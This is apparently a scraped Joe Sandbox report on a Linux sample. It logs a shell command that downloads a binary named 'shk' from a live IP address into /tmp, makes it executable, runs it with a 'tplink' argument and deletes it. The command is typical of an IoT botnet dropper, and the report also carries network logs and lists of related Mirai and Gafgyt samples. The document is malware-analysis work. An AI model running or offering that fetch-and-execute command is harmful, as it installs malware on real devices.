Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report

Overview

General Information

Analysis ID:1417455
Infos:

Detection

Score:1
Range:0 - 100
Whitelisted:false

Signatures

Executes the "rm" command used to delete files or directories
Executes the "wget" command typically used for HTTP/S downloading
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1417455
Start date and time:2024-03-29 10:32:33 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 27s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxcmdlinecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:CLEAN
Classification:clean1.lin@0/0@0/0
Command:/bin/sh -c "cd /tmp; rm -rf shk; wget http:/89.190.156.173/shk; chmod 777 shk; ./shk tplink; rm -rf shk"
PID:6220
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:--2024-03-29 10:33:08-- http://89.190.156.173/shk
  • system is lnxubuntu20
  • sh (PID: 6220, Parent: 6135, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cd /tmp; rm -rf shk; wget http://89.190.156.173/shk; chmod 777 shk; ./shk tplink; rm -rf shk"
    • sh New Fork (PID: 6221, Parent: 6220)
    • rm (PID: 6221, Parent: 6220, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf shk
    • sh New Fork (PID: 6222, Parent: 6220)
    • wget (PID: 6222, Parent: 6220, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://89.190.156.173/shk
  • cleanup
No yara matches
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: /bin/sh (PID: 6222)Wget executable: /usr/bin/wget -> wget http://89.190.156.173/shkJump to behavior
Source: global trafficTCP traffic: 192.168.2.23:36504 -> 89.190.156.173:80
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownTCP traffic detected without corresponding DNS query: 89.190.156.173
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: classification engineClassification label: clean1.lin@0/0@0/0
Source: /bin/sh (PID: 6221)Rm executable: /usr/bin/rm -> rm -rf shkJump to behavior
Source: /bin/sh (PID: 6222)Wget executable: /usr/bin/wget -> wget http://89.190.156.173/shkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
File Deletion
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417455 Cookbook: defaultlinuxcmdlinecookbook.jbs Startdate: 29/03/2024 Architecture: LINUX Score: 1 12 109.202.202.202, 80 INIT7CH Switzerland 2->12 14 89.190.156.173, 80 HOSTUS-GLOBAL-ASHostUSHK United Kingdom 2->14 16 2 other IPs or domains 2->16 6 sh 2->6         started        process3 process4 8 sh rm 6->8         started        10 sh wget 6->10         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
89.190.156.173
unknownUnited Kingdom
7489HOSTUS-GLOBAL-ASHostUSHKfalse
109.202.202.202
unknownSwitzerland
13030INIT7CHfalse
91.189.91.43
unknownUnited Kingdom
41231CANONICAL-ASGBfalse
91.189.91.42
unknownUnited Kingdom
41231CANONICAL-ASGBfalse
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
109.202.202.202XIbeqhmmQI.elfGet hashmaliciousGafgyt, MiraiBrowse
    XmztmwSit3.elfGet hashmaliciousUnknownBrowse
      D2sLkFb0Il.elfGet hashmaliciousGafgyt, MiraiBrowse
        ehDbsf5C6M.elfGet hashmaliciousGafgyt, MiraiBrowse
          arm5.elfGet hashmaliciousMiraiBrowse
            SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elfGet hashmaliciousUnknownBrowse
              cG90Z4Gln7.elfGet hashmaliciousMirai, GafgytBrowse
                xU378s6kE2.elfGet hashmaliciousMiraiBrowse
                  1IE558rszZ.elfGet hashmaliciousUnknownBrowse
                    nFcIJ8AqNP.elfGet hashmaliciousUnknownBrowse
                      91.189.91.43XIbeqhmmQI.elfGet hashmaliciousGafgyt, MiraiBrowse
                        XmztmwSit3.elfGet hashmaliciousUnknownBrowse
                          D2sLkFb0Il.elfGet hashmaliciousGafgyt, MiraiBrowse
                            ehDbsf5C6M.elfGet hashmaliciousGafgyt, MiraiBrowse
                              arm5.elfGet hashmaliciousMiraiBrowse
                                SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elfGet hashmaliciousUnknownBrowse
                                  cG90Z4Gln7.elfGet hashmaliciousMirai, GafgytBrowse
                                    xU378s6kE2.elfGet hashmaliciousMiraiBrowse
                                      1IE558rszZ.elfGet hashmaliciousUnknownBrowse
                                        nFcIJ8AqNP.elfGet hashmaliciousUnknownBrowse
                                          91.189.91.42XIbeqhmmQI.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            XmztmwSit3.elfGet hashmaliciousUnknownBrowse
                                              D2sLkFb0Il.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                ehDbsf5C6M.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  arm5.elfGet hashmaliciousMiraiBrowse
                                                    SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elfGet hashmaliciousUnknownBrowse
                                                      cG90Z4Gln7.elfGet hashmaliciousMirai, GafgytBrowse
                                                        xU378s6kE2.elfGet hashmaliciousMiraiBrowse
                                                          1IE558rszZ.elfGet hashmaliciousUnknownBrowse
                                                            nFcIJ8AqNP.elfGet hashmaliciousUnknownBrowse
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CANONICAL-ASGBXIbeqhmmQI.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 91.189.91.42
                                                              XmztmwSit3.elfGet hashmaliciousUnknownBrowse
                                                              • 91.189.91.42
                                                              D2sLkFb0Il.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 91.189.91.42
                                                              ehDbsf5C6M.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 91.189.91.42
                                                              78mfG4QdNn.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 185.125.190.26
                                                              mZFiaBnsij.elfGet hashmaliciousUnknownBrowse
                                                              • 185.125.190.26
                                                              arm6.elfGet hashmaliciousMiraiBrowse
                                                              • 185.125.190.26
                                                              arm5.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elfGet hashmaliciousUnknownBrowse
                                                              • 91.189.91.42
                                                              cG90Z4Gln7.elfGet hashmaliciousMirai, GafgytBrowse
                                                              • 91.189.91.42
                                                              CANONICAL-ASGBXIbeqhmmQI.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 91.189.91.42
                                                              XmztmwSit3.elfGet hashmaliciousUnknownBrowse
                                                              • 91.189.91.42
                                                              D2sLkFb0Il.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 91.189.91.42
                                                              ehDbsf5C6M.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 91.189.91.42
                                                              78mfG4QdNn.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 185.125.190.26
                                                              mZFiaBnsij.elfGet hashmaliciousUnknownBrowse
                                                              • 185.125.190.26
                                                              arm6.elfGet hashmaliciousMiraiBrowse
                                                              • 185.125.190.26
                                                              arm5.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elfGet hashmaliciousUnknownBrowse
                                                              • 91.189.91.42
                                                              cG90Z4Gln7.elfGet hashmaliciousMirai, GafgytBrowse
                                                              • 91.189.91.42
                                                              INIT7CHXIbeqhmmQI.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 109.202.202.202
                                                              XmztmwSit3.elfGet hashmaliciousUnknownBrowse
                                                              • 109.202.202.202
                                                              D2sLkFb0Il.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 109.202.202.202
                                                              ehDbsf5C6M.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 109.202.202.202
                                                              Mcb5K3TOWT.exeGet hashmaliciousUnknownBrowse
                                                              • 213.144.142.24
                                                              arm5.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              SecuriteInfo.com.Linux.BtcMine.791.1794.25936.elfGet hashmaliciousUnknownBrowse
                                                              • 109.202.202.202
                                                              cG90Z4Gln7.elfGet hashmaliciousMirai, GafgytBrowse
                                                              • 109.202.202.202
                                                              xU378s6kE2.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              1IE558rszZ.elfGet hashmaliciousUnknownBrowse
                                                              • 109.202.202.202
                                                              HOSTUS-GLOBAL-ASHostUSHKQuotation.exeGet hashmaliciousGuLoaderBrowse
                                                              • 104.128.228.214
                                                              DHL_DOCUMENT_73838374673_6647383743_PDF.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 185.185.40.11
                                                              DHL.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 104.128.228.214
                                                              JOU24013126.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.128.228.214
                                                              Unpaid INV02.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 104.128.228.214
                                                              New_order_requirments_7383882736_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 185.185.40.11
                                                              DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 104.128.228.214
                                                              DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 104.128.228.214
                                                              PI.1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 104.128.228.214
                                                              DHL Booking.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 104.128.228.214
                                                              No context
                                                              No context
                                                              No created / dropped files found
                                                              No static file info
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Mar 29, 2024 10:33:08.752141953 CET3650480192.168.2.2389.190.156.173
                                                              Mar 29, 2024 10:33:09.772527933 CET3650480192.168.2.2389.190.156.173
                                                              Mar 29, 2024 10:33:11.212419033 CET43928443192.168.2.2391.189.91.42
                                                              Mar 29, 2024 10:33:11.788326025 CET3650480192.168.2.2389.190.156.173
                                                              Mar 29, 2024 10:33:15.819755077 CET3650480192.168.2.2389.190.156.173
                                                              Mar 29, 2024 10:33:16.843605042 CET42836443192.168.2.2391.189.91.43
                                                              Mar 29, 2024 10:33:18.379547119 CET4251680192.168.2.23109.202.202.202
                                                              Mar 29, 2024 10:33:24.010555983 CET3650480192.168.2.2389.190.156.173
                                                              Mar 29, 2024 10:33:32.457366943 CET43928443192.168.2.2391.189.91.42
                                                              Mar 29, 2024 10:33:40.136331081 CET3650480192.168.2.2389.190.156.173
                                                              Mar 29, 2024 10:33:42.695974112 CET42836443192.168.2.2391.189.91.43
                                                              Mar 29, 2024 10:33:48.839250088 CET4251680192.168.2.23109.202.202.202
                                                              Mar 29, 2024 10:34:13.411706924 CET3650480192.168.2.2389.190.156.173
                                                              Mar 29, 2024 10:34:13.411705971 CET43928443192.168.2.2391.189.91.42
                                                              Mar 29, 2024 10:34:33.888701916 CET42836443192.168.2.2391.189.91.43
                                                              Mar 29, 2024 10:35:19.950126886 CET3650680192.168.2.2389.190.156.173
                                                              Mar 29, 2024 10:35:20.954165936 CET3650680192.168.2.2389.190.156.173
                                                              Mar 29, 2024 10:35:22.969788074 CET3650680192.168.2.2389.190.156.173
                                                              Mar 29, 2024 10:35:27.129270077 CET3650680192.168.2.2389.190.156.173
                                                              Mar 29, 2024 10:35:35.320091963 CET3650680192.168.2.2389.190.156.173
                                                              Mar 29, 2024 10:35:51.445890903 CET3650680192.168.2.2389.190.156.173
                                                              Mar 29, 2024 10:36:24.465286970 CET3650680192.168.2.2389.190.156.173

                                                              System Behavior

                                                              Start time (UTC):09:33:08
                                                              Start date (UTC):29/03/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "cd /tmp; rm -rf shk; wget http://89.190.156.173/shk; chmod 777 shk; ./shk tplink; rm -rf shk"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:33:08
                                                              Start date (UTC):29/03/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:33:08
                                                              Start date (UTC):29/03/2024
                                                              Path:/usr/bin/rm
                                                              Arguments:rm -rf shk
                                                              File size:72056 bytes
                                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                              Start time (UTC):09:33:08
                                                              Start date (UTC):29/03/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:33:08
                                                              Start date (UTC):29/03/2024
                                                              Path:/usr/bin/wget
                                                              Arguments:wget http://89.190.156.173/shk
                                                              File size:548568 bytes
                                                              MD5 hash:996940118df7bb2aaa718589d4e95c08